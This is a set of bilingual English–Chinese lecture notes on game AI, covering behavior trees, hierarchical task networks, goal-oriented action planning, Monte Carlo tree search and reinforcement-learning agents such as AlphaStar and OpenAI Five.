    ​控制节点选择器 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Success or Running, then return value accordingly

        直到一个子节点返回 Success 或 Running,然后相应地返回值

      • or all children return Failure, then return Failure

        或所有子节点都返回 Failure,然后返回 Failure

    • If Stop and Return Runningthe next execution will start from the runningaction

      如果 Stop 并 Return Running,则下一次执行将从 running 操作开始

    webp

    Control Node-Selector (2/2)

    ​控制节点选择器 (2/2)

    Selector

    ​选择器

    • Could select one action to do response to different environment

      可以选择一个动作来响应不同的环境

    • Could do the right thing according to priority

      可以根据优先级做正确的事情

    webp

    Control Node- Parallel (1/2)

    ​控制节点 - 并行 (1/2)

    • Order

      顺序

      • Logically execute all children simultaneously

        逻辑上同时执行所有子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • Return Success when at least M childnodes (between 1 and N) have succeeded

        当至少 M 个子节点(介于 1 和 N 之间)成功时返回成功

      • Return Failure when at least N - M + 1 child nodes (between 1 and N) have failed

        当至少 N - M + 1 个子节点(介于 1 和 N 之间)失败时返回失败

      • Otherwise return Running

        否则返回正在运行

    • If Stop and Return Running

      如果停止并返回正在运行

    • the next execution will start from the running actions

      下一次执行将从正在运行的操作开始

    webp

    Control Node - Parallel (2/2)

    ​控制节点 - 并行 (2/2)

    Parallel

    ​并行

    • Could do multiple things “at the same time”

      可以同时做多件事

    webp

    Behavior Tree

    ​行为树

    Execution nodes

    ​执行节点

    • Action

      操作

    • Condition

      条件

    Control flow nodes

    ​控制流节点

    • Sequence

      序列

    • Selector

      选择器

    • Parallel

      并行

    Node TypeSymbolSucceedsFailsRunning
    SequencewebpIf all children succeedlf one child failsIf one child returns Running
    SelectorwebpIf one child succeedsIf all children failIf one child returns Running
    ParallelwebpIf ≥ M children succeedIf > N - M children failelse
    ConditionwebpUpon completionIf impossible to completeDuring completion
    Actionwebplf trueIf falseNever

    Tick a Behavior Tree

    ​勾选行为树

    • The tick of BT is like thinking

      BT 的勾选就像思考

    • Every tick start from root node

      每次勾选都从根节点开始

    • Go through different nodes from up to down, left to right

      从上到下、从左到右遍历不同的节点

    • Each node must return failure, success or running

      每个节点必须返回失败、成功或正在运行

    webp

    Behavior Tree-Decorator (1/2)

    ​行为树装饰器 (1/2)

    Decorator

    ​装饰器

    • A special kind of control node with a single child node

      一种特殊的控制节点,只有一个子节点

    • Usually some behavior pattern which is commonly used

      通常是一些常用的行为模式

    webp

    • For example, some common policies:
      • Loop execution
      • Execute once
      • Timer
      • Time Limiter
      • Value Modifier
      • Etc.

    Behavior Tree - Decorator (2/2)

    ​行为树 - 装饰器 (2/2)

    Decorator

    ​装饰器

    • Example: Use timer to implement “patrol”

      示例:使用计时器实现“巡逻”

    webp

    Behavior Tree-Precondition

    ​行为树-前提条件

    Simplify behavior tree structure with preconditions

    ​使用前提条件简化行为树结构

    webp

    Behavior Tree-Blackboard

    ​行为树-黑板

    Blackboard: the memory of behavior tree

    ​黑板:行为树的记忆

    webp

    Behavior Tree - Pros

    ​行为树 - 优点

    • Modular, Hierarchical organization

      模块化、分层组织

      • each subtree of a BT can be seen as a module, with a standard interface given by the return statuses

        BT 的每个子树都可以看作一个模块,具有由返回状态给出的标准接口

    • Human readable

      人类可读

    • Easy to maintain

      易于维护

      • Modification only affect parts of tree

        修改仅影响树的部分

    webp

    • Reactivity

      反应性

      • Think every tick to quickly change behavior according to environment

        思考每一次滴答,根据环境快速改变行为

    • Easy to Debug

      易于调试

      • Every tick is a whole decision making process, so that it is easy to debug

        每一次滴答都是一个完整的决策过程,因此易于调试

    webp

    Behavior Tree - Cons

    ​行为树 - 缺点

    Cons

    ​缺点

    • Each tick starts from root node which costs much more

      每次更新都从根节点开始,成本更高

    • The more reactive, the more condition to be checked andthe more costs per tick

      反应性越高,需要检查的条件就越多,每次更新的成本就越高

    Upcoming: Al Planning and Goals

    ​即将推出:人工智能规划和目标

    To make the Al more deliberative, game designers introduced the Al Planning technique to improve the planning ability of Al

    ​为了让人工智能更具深思熟虑,游戏设计师引入了人工智能规划技术来提高人工智能的规划能力

    Al Planning:

    ​人工智能规划:

    • Manage a set of actions

      管理一组动作

    • A planner make a plan according tothe initial world state

      规划者根据初始世界状态制定计划

    webp

    Reference

    Steering & Sensing

    Crowd Simulation

    Classical Decision Making Algorithms

    第十七节:游戏引擎 Gameplay 玩法系统:高级 AI

    Adavanced Artificial Intelligence

    ​高级 AI

    • Hierarchical Tasks Network

      分层任务网络

    • Goal-Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Machine Learning Basic

      机器学习基础

    • Build Advanced Game Al

      构建高级游戏人工智能

    Hierarchical Tasks Network

    ​层次任务网络

    Overview

    HTN assumes there are many Hierarchical tasks

    ​HTN 假设存在许多分层任务

    webp

    Make a Plan like Human

    ​像人类一样制定计划

    Hierarchical:

    ​分层:

    • people in real world usually make their plan hierarchically

      现实世界中的人们通常分层制定计划

    webp

    ​为了完成 Take a class,我可能需要做出的 Method。

    HTN Framework (1/2)

    ​HTN 框架

    World state

    ​世界状态

    • Contains a bunch of properties

      包含一系列属性

    • Input to planner, reflect the status of world

      输入到规划器,反映世界的状态

    • It’s a Subject World View in Al Brain

      它是人工智能大脑中的主体世界观

    Sensors

    ​传感器

    • Perceive changes of environment and modify world state

      感知环境变化并修改世界状态

    • It’s more like Perception

      它更像是感知

    webp

    HTN Framework (2/2)

    HTN Domain

    ​HTN 域

    • Load from asset

      从资产加载

    • Describe the relationship of hierarchical tasks

      描述分层任务的关系

    Planner

    ​规划器

    • Make a plan from World State and HTN Domain

      根据世界状态和 HTN 域制定计划

    Plan Runner

    ​计划运行器

    • Running the plan

      运行计划

    • Update the world state after the task

      任务完成后更新世界状态

    webp

    HTN Task Types

    ​HTN 任务类型

    Two types of Tasks

    ​两种类型的任务

    • Primitive Task

      原始任务

    • Compound Task

      复合任务

    webp

    Primitive Task (1/2)

    ​原始任务 (1/2)

    • Preconditions

      前提条件

      • Determine whether an action could be executed

        确定是否可以执行某个操作

      • Check whether properties of game world being satisfied

        检查游戏世界的属性是否得到满足

    • Action

      操作

      • Determine what action the primitive task executes

        确定原始任务执行什么操作

    • Effects

      效果

      • Describe how the primitive task modify the game world state properties

        描述原始任务如何修改游戏世界状态属性

    webp

    webp

    • 前提条件:有解药
    • 操作:使用解药
    • 效果:解除负面状态,消耗解药

    Compound Task (1/2)

    ​复合任务 (1/2)

    Compound Tasks

    ​复合任务

    • Contain several methods

      包含多种方法

    • Methods have different priority

      方法具有不同的优先级

    • Each method has preconditions

      每种方法都有先决条件

    Method

    ​方法

    • contains a chain of sub-Tasks

      包含一系列子任务

    • Sub-task could be a primitive task or a compound task

      子任务可以是原始任务或复合任务

    webp

    webp

    解毒任务:

    • 有足够材料——制作解药
    • 有足够钱——买解药
    • 最后使用解药解毒

    HTN Domain

    webp

    webp

    Planning

    Step 1

    • Start from the root task

      从根任务开始

    • Choose the method satisfying the precondition in order

      按顺序选择满足前提条件的方法

    webp

    Step 2

    • Decompose the method to tasks

      将方法分解为任务

    • Check precondition in order

      按顺序检查前提条件

    • Decompose the task if it is a compound task

      如果任务是复合任务,则将其分解

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • Assume all action will be succeed, update “world state” in temporary memory

      假设所有操作都会成功,在临时内存中更新“世界状态”

    • World state has a duplicated copy in planning phase for scratch paper

      世界状态在规划阶段有一份草稿纸的副本

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • go back and select a new method if precondition is not satisfied

      如果先决条件不满足,则返回并选择新方法

    webp

    Step 2 (For compound task)

    ​第 2 步(针对复合任务)

    • select the next method if precondition is not satisfied

      如果先决条件不满足,则选择下一个方法

    webp

    Step 3

    • Repeat step 2 until no more task needs to be done

      重复步骤 2,直到不再需要完成任务

    • The final plan contains only primitive tasks

      最终计划仅包含原始任务

    webp

    webp

    Run plan

    ​运行计划

    Run plan

    ​运行计划

    • Execute tasks in order

      按顺序执行任务

    • Stop until all tasks succeed, or one task failed

      停止直到所有任务成功,或一个任务失败

    Execute task

    ​执行任务

    • Check precondition and return failure if not satisfied

      检查先决条件,如果不满足则返回失败

    • Execute action

      执行操作

      • if succeed -> update world state and return success

        如果成功 -> 更新世界状态并返回成功

      • if failed -> return failure

        如果失败 -> 返回失败

    webp

    Replan

    ​重新规划

    There are three situations that the agent could start plan

    ​代理可以在三种情况下启动计划

    • Not have a plan

      没有计划

    • The current plan is finished or failed

      当前计划已完成或失败

    • The World State changes via its sensor

      世界状态通过其传感器发生变化

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • HTN is similar with BT, and it is more high-level

      HTN 与 BT 类似,但更高级

    • It outputs a plan which has long-term effect

      它输出具有长期效果的计划

    • It would be faster compared to the BT in the same case

      在相同情况下,它比 BT 更快

    Cons:

    ​缺点:

    • Player’s behavior is unpredictable, so the tasks may be easy to fail

      玩家行为不可预测,因此任务可能很容易失败

    • The World state and the effect of tasks are challenging for designers

      世界状态和任务效果对设计师来说具有挑战性

    Goal-Oriented Action Planning

    ​以目标为导向的行动计划

    Goal-Oriented Action Planning (GOAP)

    ​目标导向行动计划 (GOAP)

    • GOAP is more automated

      GOAP 更加自动化

    • It takes backward planning rather than forward

      它需要向后规划,而不是向前规划

    webp

    Structure

    ​结构

    Sensors and World State

    ​传感器和世界状态

    • Similar to HTN

      类似于 HTN

    Goal set

    ​目标集

    • All available goals

      所有可用目标

    Action set

    ​行动集

    • All available actions

      所有可用行动

    Planning

    ​规划

    • Output sequence of actions

      输出行动序列

    webp

    Goal Set

    ​目标集

    • Precondition decides which goal will be selected

      前提条件决定选择哪个目标

    • Priority decide witch goal should be selected among all the possible goals

      优先级决定在所有可能的目标中选择哪个目标

    • Each goal can be presented as a Collection of States

      每个目标都可以表示为状态集合

    webp

    Goal Selection

    ​目标选择

    webp

    Action Set

    ​动作集

    Action in GOAP is with precondition, effect and cost

    ​GOAP 中的动作具有前提条件、效果和成本

    • Precondition: in which state, character can do this action

      前提条件:角色在哪种状态下可以执行此动作

    • Effect: after the action is done, how does the world statechanges

      效果:执行动作后,世界状态如何变化

    • Cost: defined by developer, used as a weight to make theplan which has the lowest cost

      成本:由开发人员定义,用作制定成本最低的计划的权重

    webp

    Backward Planning Like a Human

    ​像人类一样进行反向规划

    • When making a plan, start from goal state

      制定计划时,从目标状态开始

    webp

    Goal:解毒

    反向规划:使用解药-花钱买解药-拜访商店并付款

    Planning

    ​规划

    Step 1

    • Check goals according to priority

      根据优先级检查目标

    • Find the first goal of which precondition is satisfied

      找到第一个满足先决条件的目标

    webp

    Step 2

    • Compare the target state with world state to find unsatisfied goal

      将目标状态与世界状态进行比较,找出未满足的目标

    • Set all unsatisfied states of the goal into a stack

      将目标的所有未满足状态放入堆栈中

    webp

    Step 3

    • Check the top unsatisfied state from the stack

      从堆栈中检查顶部未满足的状态

    • Select an action from action set which could satisfy the chosen state

      从操作集中选择一个可以满足所选状态的操作

    • Pop the state if it is satisfied by the selected action

      如果所选操作满足该状态,则弹出该状态

    webp

    Step 4

    • Push action to plan stack

      将操作推送到计划堆栈

    • Check precondition of corresponded action

      检查相应操作的前提条件

    • If precondition is not satisfied, push state to stack of unsatisfied states

      如果前提条件不满足,则将状态推送到不满足状态堆栈

    webp

    Build States-Action-Cost Graph

    ​构建状态-动作-成本图

    Can be turned into a path planning problem

    ​可以转化为路径规划问题(动态规划

    • Node: combination of states

      节点:状态组合

    • Edge: Action

      边:动作

    • Distance: Cost

      距离:成本

    Search direction

    ​搜索方向

    • Start node: states of the goal

      起始节点:目标状态

    • End node: current states

      结束节点:当前状态

    webp

    ​根据目标解毒,从当前状态找到成本最低的路线。

    The Lowest Cost Path

    ​最低成本路径

    Can use A* or other shortest path algorithms

    ​可以使用 A* 或其他最短路径算法

    • Heuristics can be represented with number of unsatisfied states

      启发式算法可以用不满足状态的数量来表示

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • Compared with HTN, GOAP plans is more dynamic

      与 HTN 相比,GOAP 计划更具动态性

    • Decoupling goals and behaviors

      将目标和行为分离

    • HTN can easily make precondition/effect mismatching mistakes

      HTN 很容易犯前提条件 / 效果不匹配的错误

    Cons:

    ​缺点:

    • In a single Al system, the runtime planning would be slower than BT/FSM/HTN

      在单个 AI 系统中,运行时规划会比 BT/FSM/HTN 慢

    • Also needs a well-represented world state and action effect

      还需要一个具有良好表现的世界状态和行动效果

    ​蒙特卡洛树搜索

    Monte Carlo Tree Search

    MCTS is another automated planning, and it behaves more diversely

    ​MCTS 是另一种自动化规划,其行为更加多样化

    webp

    ​AlphaGo 就用到了蒙特卡洛树搜索。

    webp

    Like playing chess, simulate millions possible moves in mind and choose the“best” step

    ​就像下棋一样,在脑海中模拟数百万种可能的走法,并选择“最佳”一步

    Monte Carlo Method

    ​蒙特卡洛方法

    • A broad class of computational algorithms that rely on repeated random sampling to obtain numerical results

      一大类依赖重复随机抽样来获得数值结果的计算算法

    webp

    Monte Carlo Tree Search

    webp

    ​对于当前棋局状态,给出可能的合理行为,求 best move。

    States and Actions

    ​状态和动作

    State

    ​状态

    • The state of game

      游戏状态

    • Represented by a node

      用节点表示

    webp

    Action

    ​动作

    • One step operation of Al

      人工智能的一步操作

    • Represented by an edge

      用边表示

    webp

    States Transfer

    Transfer state from A to B by action

    webp

    State Space

    ​状态空间

    A Tree Structured State space:

    ​树结构状态空间:

    The set of states that can be reached from the current state after a possible sequence of actions

    ​从当前状态经过一系列可能的操作后可以到达的状态集

    webp

    NOTICE: Rebuild the State Space for Each Move

    ​注意:每次移动都要重建状态空间

    webp

    Simulation: Playing a Game in Mind Quickly

    ​模拟:快速在脑海中玩游戏

    Simulation

    ​模拟

    • Run from the state node according to the Default Policy to produce an outcome

      根据默认策略从状态节点运行以产生结果

    In the case of Go

    ​围棋的情况

    • Apply random moves from the state until the game is over

      从状态中应用随机动作直到游戏结束

    • Return 1 (win) or 0 (loss) depending on the result

      根据结果返回 1(赢)或 0(输)

    Default Policy

    ​默认策略

    • A meaningful but quick rule or neural network to playthe game

      一个有意义但快速的规则或神经网络来玩游戏

    webp

    How to evaluate the states?

    ​如何评估状态?

    Evaluation Factors

    ​评估因素

    • Q: Accumulation of Simulation Results

      Q:模拟结果的累积

    • N: Number of simulations

      N:模拟次数

    Simulation Results and Number ofsimulations Maybe not direct simulation but from child nodes

    ​模拟结果和模拟次数可能不是直接模拟,而是来自子节点

    webp

    Backpropagate

    ​反向传播

    Propagate influence of child state back parent state

    ​将子状态的影响传播回父状态

    • $Q_{FatherNode}=Q_{FatherNode} +Q_{BackchildNode}$

    • $N_{node} = N_{node} + 1$

    • Repeat it until reaching the root

      重复此操作直至到达根节点

    webp

    lteration Steps

    ​迭代步骤

    • Selection: select the most urgent “expandable” node

      选择:选择最紧急的“可扩展”节点

    • Expansion:expand the tree by selecting an action

      扩展:通过选择操作扩展树

    • Simulation: simulate from the new node and produce an outcome

      模拟:从新节点进行模拟并产生结果

    • Backpropagate: backpropagate the outcome of simulation from the new node

      反向传播:从新节点反向传播模拟结果

    webp

    Search in “Infinite” State Space

    ​在“无限”状态空间中搜索

    Generally impossible to traverse the state space

    ​通常不可能遍历状态空间

    • We prioritize exploring the most promising regions in state space

      我们优先探索状态空间中最有希望的区域

    • Pre-set a computational budget and stop exploring the state space when the budget is reached

      预设计算预算,并在达到预算时停止探索状态空间

    Selection-Expandable Node

    ​选择可扩展节点

    Select the most urgent “expandable” node

    ​选择最紧急的“可扩展”节点

    “expandable" node

    ​“可扩展”节点

    • Nonterminal state and has unvisited children

      非终止状态且有未访问的子节点

    • Example:

      示例:

    webp

    Selection-Exploitation and Exploration

    ​选择-开发和探索

    Exploitation

    ​开发

    • Look in areas which appear to be promising

      寻找看似有希望的领域

    • Select the child which has high Q/N value

      选择具有高 Q/N 值的子项

    webp

    Exploration

    ​探索

    • Look in areas that have not been well sampled yet

      查看尚未充分采样的区域

    • Select the child which has low number of visits

      选择访问次数较少的子项

    webp

    webp

    UCB (Upper Confidence Bounds)

    ​UCB(置信上限)

    How to balance exploration and exploitation?

    ​如何平衡探索和开发?

    • Use UCB (Upper Confidence Bounds) formula

      使用 UCB(置信上限)公式

    • $UCB_j$ :the UCB value of the node $j$

      $UCB_j$:节点 $j$ 的 UCB 值

    • $Q_j$: the total reward of all playouts that passed through node $j$

      $Q_j$:经过节点 $j$ 的所有播放的总奖励

    • $N_j$ : the number of times node $j$ has been visited

      $N_j$:节点 $j$ 被访问的次数

    • $N$ : the number of times the parent node of node $j$ has been visited

      $N$:节点 $j$ 的父节点被访问的次数

    • $C$: a constant, adiusted to lower or increase the amount of exploration performe

      $C$:一个常数,调整以降低或增加探索执行量

    webp

    Selection

    ​选择

    How to select the most urgent expandable node

    ​如何选择最紧急的可扩展节点

    • Always Search from the root node

      始终从根节点搜索

    • Find the highest UCB value child node (promising child) of current node

      查找当前节点的 UCB 值最高的子节点(有希望的子节点)

    • Set promising child as current node

      将有希望的子节点设置为当前节点

    • Iterate above steps until current node is expandable. Set current node as selected node

      迭代上述步骤,直到当前节点可扩展。将当前节点设置为选定节点

    webp

    Expansion

    ​扩展

    Expansion

    ​扩展

    • One or more new child nodes are added to selected node, according to the available actions

      根据可用操作,向选定节点添加一个或多个新子节点

    • The value of child node is unknown

      子节点的值未知

    webp

    Simulation and Backpropagation

    ​模拟和反向传播

    webp

    The End Condition

    ​结束条件

    Computational budget

    ​计算预算

    • Memory size (the number of nodes)

      内存大小(节点数)

    • Computation time

      计算时间

    webp

    How to Choose the Best Move?

    ​如何选择最佳移动?

    The “best” child node of current state node

    ​当前状态节点的“最佳”子节点

    • Max child: Select the root child with the highest Q-value

      最大子节点:选择具有最高 Q 值的根子节点

    • Robust child: Select the most visited root child

      稳健子节点:选择访问次数最多的根子节点

    • Max-Robust child: Select the root child with both the highest visit count and the highest reward. lf none exist, then continue searching until an acceptable visit count is achieved

      最大稳健子节点:选择访问次数和奖励都最高的根子节点。如果不存在,则继续搜索,直到达到可接受的访问次数。

    • Secure child: Select the child which maximises a lowerconfidence bound (LCB)

      安全子节点:选择最大化下置信区间 (LCB) 的子节点

    $$LCB_{j}=\frac{Q_j}{N_j}-C\cdot\sqrt{\frac{2\ln(N)}{N_j}}$$

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • MCTS agent behaves diverse

      MCTS 代理行为多样

    • Agent makes the decision totally by itself

      代理完全自行做出决策

    • Can solve the problem of large search space

      可以解决搜索空间大的问题

    Cons:

    ​缺点:

    • The action and state are hard to design for most real-time games

      对于大多数实时游戏来说,动作和状态很难设计

    • It is hard to model for most real-time games

      对于大多数实时游戏来说,很难建模

    Machine Learning Basic

    ​机器学习基础

    Machine Learning

    ​机器学习

    Four Types of Machine Learning

    ​机器学习的四种类型

    • Supervised learning

      监督学习

    • Unsupervised learning

      无监督学习

    • Semi-supervised learning

      半监督学习

    • Reinforcement learning

      强化学习

    webp

    ML Types: Supervised Learning

    ​ML 类型:监督学习

    • Learn from labeled data

      训练时提供标记数据

    webp

    ML Types: Unsupervised Learning

    ​ML 类型:无监督学习

    • Learn from unlabeled data

      从未标记的数据中学习

    webp

    ​无监督学习便于处理聚类问题。

    ML Types: Semi-supervised Learning

    ​ML 类型:半监督学习

    • Learn from a lot of unlabeled data and very scarce labeled data

      从大量未标记数据和非常稀少的标记数据中学习

    webp

    ML Types: Reinforcement learning

    ​ML 类型:强化学习

    • Learn from an interaction process with environment

      从与环境的交互过程中学习

    webp

    Reinforcement Learning

    ​强化学习

    Reinforcement learning (RL) is an area of machine learning concerned with how intelligent agents ought to take actions in an environment in order to maximize the notion of cumulative reward.

    强化学习 (RL) 是机器学习的一个领域,它关注智能代理如何在环境中采取行动,以最大化累积奖励的概念。

    • Trial-and-error search

      反复试验

    • The learner must discover which actions yield the most reward by trying them

      学习者必须通过尝试发现哪些行动能产生最大的奖励

    • Delayed reward

      延迟奖励

    • Actions may affect the immediate reward, thenext situation and all subsequent rewards

      行动可能会影响即时奖励、下一个情况和所有后续奖励

    Markov Decision Process-Basic Elements (1/4)

    ​马尔可夫决策过程-基本概念

    • Agent

      代理

      The learner and decision maker

      学习者和决策者

    • Environment

      环境

      The thing the agent interacts with, comprising everything outside the agent

      代理与之交互的事物,包括代理之外的一切

    webp

    Markov Decision Process-State (2/4)

    ​马尔可夫决策过程 - 状态 (2/4)

    State is the observation of the agent, and the data structure is designed by human

    ​状态是代理的观察,数据结构由人设计

    webp

    Markov Decision Process-Action (3/4)

    ​马尔可夫决策过程-行动 (3/4)

    Action is the minimal element the agent could behave in the game It is also designed by human

    ​行动是代理在游戏中可以表现的最小元素,它也是由人类设计的

    webp

    Markov Decision Process-Reward (4/4)

    ​马尔可夫决策过程-奖励 (4/4)

    A special signal the agent receives at each time step passing from environment to the agent

    ​代理在从环境传递到代理的每个时间步骤中收到的特殊信号

    webp

    MDP Mathematical Mode

    ​MDP 数学模式

    • Probability of transition

      转换概率

      The probability of transition from s to s’ after taking action a

      采取行动 a 后从 s 转换到 s’ 的概率

    $$p(s’|s, a)=P(S_t=s’|S_{t-1}=s, A_{t-1}=a)$$

    • Policy

      策略

      A mapping from states to probabilities of selecting each possible action

      从状态到选择每个可能行动的概率的映射

    $$\pi(a|s)=P(A_t=a|S_t=2)$$

    • Total reward

      总奖励

      The cumulative reward it receives in the long run

      从长远来看,它获得的累积奖励

    $$G_t=R_{t+1}+R_{t+2}+R_{t+3}+…+R_T$$

    $$G_t=R_{t+1}+\gamma R_{t+2}+\gamma^2R_{t+3}+…$$

    webp

    Policy

    ​策略

    A mapping from states to probabilities of selecting each possible action

    ​从状态到选择每个可能动作的概率的映射

    $$\pi(a|s)=P(A=a|S=s)$$

    webp

    Build Advanced Game AI

    ​构建高级游戏 AI

    Why Game Al needs Machine Learning

    ​为什么游戏 AI 需要机器学习

    It is notable that all previous methods actuallyneed human knowledge to design (include the cost of GOAP)

    ​值得注意的是,之前的方法实际上都需要人类知识来设计(包括 GOAP 的成本)

    But players always expect Al to be able to bothdeal with complicated game world and behave naturally and diversely

    ​但玩家总是希望 AI 能够既能应对复杂的游戏世界,又能表现得自然多样

    • Traditional methods is in limited space

      传统方法空间有限

    • Machine Learning create infinite possibilities

      机器学习创造无限可能

    webp

    Machine Learning Framework in Game

    ​游戏中的机器学习框架

    The framework of deploying a neural network to play an agent

    ​部署神经网络扮演代理的框架

    Observation:

    ​观察:

    • The Game State the Al could observe

      人工智能可以观察到的游戏状态

      • Vector feature

        矢量特征

      • Unit information

        单位信息

      • Environment information

        环境信息

      • Etc.

    • lmage

      图像

    webp

    DRL Example-Model the Game

    ​DRL 示例-游戏建模

    A DRL design process should contain:

    ​DRL 设计流程应包含:

    • State

      状态

    • Action

      动作

    • Reward

      奖励

    • NN design

      神经网络设计

    • Training Strategy

      训练策略

    webp

    DRL Example-State

    webp

    ​如上图这个游戏,状态 = 小地图 + 游戏统计 + 单位 + 玩家数据

    States (1/2)-Maps

    ​状态-地图

    Heights

    ​高度

    Visibility: fog of war

    ​可见性:战争迷雾

    Creep

    ​爬行

    Entity owners

    ​实体所有者

    Alerts

    ​警报

    Pathable

    ​可行进

    Buildable

    ​可建造

    webp

    States(2/2)-Units Information

    ​状态(2/2)-单位信息

    For each unit in a frame

    ​针对框架中的每个单位

    ​Unit type 单位类型

    ​OwnerStatus 所有者状态

    ​Display type 显示类型

    ​Position 位置

    ​Number of workers 工人数量

    ​Cool down 冷却

    ​Attributes 属性

    ​Unit attributes 单位属性

    ​Cargo status 货物状态

    ​Building status 建筑状态

    ​Resource status 资源状态

    ​Order status 订单状态

    ​Buff status 增益状态

    webp

    Actions

    ​动作

    For a unit it should have actions like

    ​对于一个单位来说,它应该有以下动作

    • What

      什么

      • move

        移动

      • attack

        攻击

      • build

        建造

    • Who

    • Where

      哪里

    • When next action

      何时进行下一步行动

    webp

    Rewards (1/2)

    ​奖励(1/2)

    Direct reward from game

    ​游戏直接奖励

    • Win: +1

      赢:+1

    • Lose: -1

      输:-1

    Pseudo-reward output along with critic network:

    ​与评论网络一起输出的伪奖励:

    • the distance of agent’s operation and human data statistic z

      代理操作与人类数据统计的距离 z

    webp

    Rewards (2/2)

    ​奖励 (2/2)

    Reward is much denser in OpenAl Five at Dota2

    ​Dota2 中 OpenAl Five 的奖励更加密集

    Different reward settings could help us to train different styles of agent

    ​不同的奖励设置可以帮助我们训练不同风格的代理

    • Aggressive

      激进

    • Conservative

      保守

    webp

    NN architectures

    webp

    ​OpenAI 提供的玩 Dota2 的神经网络架构。

    DRL example-Multi-Layer Perceptron (MLP)

    ​DRL 示例-多层感知器 (MLP)

    Classical and easy to implement

    ​经典且易于实现

    Flexible definition of the dimensions of inputs and outputs

    ​灵活定义输入和输出的维度

    webp

    Scalar feature example

    ​标量特征示例

    • Race

      种族

    • Owned Resource

      拥有的资源

    • Upgrade

      升级

    • Etc.

    DRL example-Convolutional Neural Network (CNN)

    ​DRL 示例-卷积神经网络(CNN)

    webp

    ​还介绍了 ResNet。

    DRL example-Transformer

    ​DRL 示例-Transformer

    • Introduce attention mechanisms

      引入注意力机制

    • Uncertain length vector

      不确定长度向量

    • Well represent the complex feature like multi agents

      很好地表示像多代理这样的复杂特征

    webp

    DRL example-Long-Short Term Memory (LSTM)

    ​DRL 示例 - 长短期记忆 (LSTM)

    Enable Al to remember or forget earlier data

    ​使 AI 能够记住或忘记早期数据

    webp

    DRL example-NN Architecture Selection

    ​DRL 示例-NN 架构选择

    NN Architecture selection for different type of feature

    ​不同类型特征的 NN 架构选择

    • Fixed length vector feature

      固定长度向量特征

      • Multi-Layer Perception

        多层感知

    • Uncertain length vector feature

      不确定长度向量特征

      • Long-Short Term Memory

        长短期记忆

      • Transformer

    • Image feature

      图像特征

      • ResNet
    • Raycast

    • Mesh

    webp

    Training Strategy-Supervised learning

    ​训练策略-监督学习

    AlphaStar is trained via both supervised learning and reinforcement learning. lt firstly learned a policy by supervised learning from human expert data

    ​AlphaStar 通过监督学习和强化学习进行训练。它首先通过监督学习从人类专家数据中学习策略

    z is a statistic summary of a strategy sampled from human data (for example,a build order)

    ​z 是从人类数据中采样的策略的统计摘要(例如,构建顺序)

    Minimize the distance (KL divergence) of agent policy and human decision distribution sampled from z

    ​最小化从 z 中采样的代理策略和人类决策分布的距离(KL 散度)

    webp

    Training Strategy-Reinforcement learning

    ​训练策略-强化学习

    Secondly, it took RL technique to improve the SL policy

    ​其次,采用强化学习技术改进 SL 策略

    TD(λ),V-trace, UPGO are specific Reinforcement learning methods to improve actor network and critic network.

    ​TD(λ)、V-trace、UPGO 是改进参与者网络和评论家网络的具体强化学习方法。

    The KL degree towards old SL policy would also be considered

    ​还会考虑对旧 SL 策略的 KL 度

    These tricks improved the policy and made it more human-like

    ​这些技巧改进了策略,使其更像人类

    webp

    Train the Agent-Self Play & Adversarial

    ​训练 Agent-自我游戏和对抗

    In AlphaStar three pools of agents attend training initialized from SL policy

    ​在 AlphaStar 中,三个 Agent 池参加从 SL 策略初始化的训练

    • Main agents [MA]

      主要 Agent [MA]

      • Goal: most robust and output

        目标:最稳健和输出

      • Self-play (35%)

        自我游戏 (35%)

      • Against past LE and ME agents (50%)

        对抗过去的 LE 和 ME Agent (50%)

      • Against past MA agents (15%)

        对抗过去的 MA Agent (15%)

    • League exploiters [LE]

      联盟利用者 [LE]

      • Goal: find weakness of past all agents (MA, LE, ME)

        目标:找到过去所有 Agent (MA、LE、ME) 的弱点

      • Against all past agents (MA, LE, ME)

        对抗所有过去的 Agent (MA、LE、ME)

    • Main exploiters [ME]

      主要利用者 [ME]

      • Goal: find weakness of current MA agent

        目标:找到当前 MA Agent 的弱点

      • Against current MA agent

        对抗当前的 MA Agent

    webp

    RL or SL?——SL analysis

    ​RL 还是 SL?——SL 分析

    Supervised Learning needs high quality data, and sometimes behaves well too

    ​监督学习需要高质量的数据,有时表现也很好

    • It behaves like human

      它表现得像人类

    • But may not outperform human expert data

      但可能不会胜过人类专家数据

    • Human data is unbalanced

      人类数据不平衡

    • Sometimes there is not enough data

      有时数据不足

    webp

    RL or SL?-RL analysis

    ​RL 还是 SL?-RL 分析

    Reinforcement Learning is usually considered as the optimal solution, however

    ​强化学习通常被认为是最佳解决方案,但是

    • Training a RL model is tough

      训练 RL 模型很困难

    • The model is hard to converge

      模型很难收敛

    • The game environment for training is also a huge development project

      训练的游戏环境也是一个巨大的开发项目

    • The data collection process could be slow

      数据收集过程可能很慢

    • And the behavior maybe unnatural

      行为可能不自然

    webp

    RL or SL?——Dense reward

    ​RL 还是 SL?——密集奖励

    What makes a good problem for RL

    ​什么才是 RL 的好问题

    webp

    RL or SL?——Summary

    Situation for SL
    SL 的情况
    Situation for RL
    强化学习的情况
    Easy to get data
    轻松获取数据
    Needs to outperform the master level
    需要超越大师水平
    Needs to perform like human
    需要像人类一样表现
    Enough budget
    足够的预算
    Data is unavailable
    数据不可用
    Dense reward
    密集奖励

    Hybrid

    ​混合

    Machine Learning is powerful.

    ​机器学习很强大。

    But it cost much too. For example, DeepMind spends 250million dollars to finish alpha star and a replication needs 13million dollars

    ​但成本也很高。例如,DeepMind 花费 2.5 亿美元完成 alpha star,而复制需要 1300 万美元

    We often need to make a tradeoff that place DNN on the human-like points (a part of thewhole combat).

    ​我们经常需要做出权衡,将 DNN 放在类人点上(整个战斗的一部分)。

    webp

    References

    HTN

    GOAP

    MCTS

    Machine Learning

    Machine Learning Game Applications

    ]]>
    + 资源

    课程

    第十五节:游戏引擎的 Gameplay 玩法系统基础

    Gameplay Complexity and Building Blocks

    ​游戏复杂性和构建模块

    Outline of Gameplay System

    ​游戏系统概述

